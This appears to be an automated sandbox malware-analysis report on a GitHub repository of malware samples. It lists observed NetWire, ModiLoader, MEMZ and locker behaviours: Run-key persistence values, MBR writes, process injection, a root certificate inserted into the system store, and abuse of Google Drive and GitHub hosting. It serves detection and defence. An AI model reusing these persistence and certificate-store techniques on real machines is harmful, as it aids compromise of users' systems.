Malware Analysis Report

2024-10-19 10:29

Sample ID 240408-12v9yadc39
Target https://github.com/Da2dalus/The-MALWARE-Repo
Tags
modiloader netwire bootkit botnet evasion persistence ransomware rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://github.com/Da2dalus/The-MALWARE-Repo was found to be: Known bad.

Malicious Activity Summary

modiloader netwire bootkit botnet evasion persistence ransomware rat stealer trojan

NetWire RAT payload

ModiLoader, DBatLoader

Netwire

ModiLoader First Stage

Disables Task Manager via registry modification

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Writes to the Master Boot Record (MBR)

Suspicious use of SetThreadContext

Sets desktop wallpaper using registry

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Modifies registry key

Suspicious use of SendNotifyMessage

Script User-Agent

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-08 22:09

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-08 22:09

Reported

2024-04-08 22:20

Platform

win10v2004-20240226-en

Max time kernel

436s

Max time network

460s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo

Signatures

ModiLoader, DBatLoader

trojan modiloader

NetWire RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Netwire

botnet stealer netwire

ModiLoader First Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows \System32\fodhelper.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" C:\Users\Admin\Downloads\NetWire.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" C:\Users\Admin\Downloads\NetWire.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Free Youtube Downloader = "C:\\Windows\\Free Youtube Downloader\\Free Youtube Downloader\\Free YouTube Downloader.exe" C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Downloads\MEMZ.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\Desktop\Wallpaper = "0" C:\Users\Admin\Downloads\$uckyLocker.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3004 set thread context of 6532 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
PID 1364 set thread context of 6296 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Program Files (x86)\internet explorer\ieinstal.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe N/A
File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe N/A
File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe N/A
File created C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.ini C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d557e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d90103000000010000001400000002faf3e291435468607857694df5e45b6885186819000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 5c00000001000000040000000008000019000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b6885186868000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b0400000001000000100000001d3554048578b03f42424dbf20730a3f20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Downloads\MEMZ.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
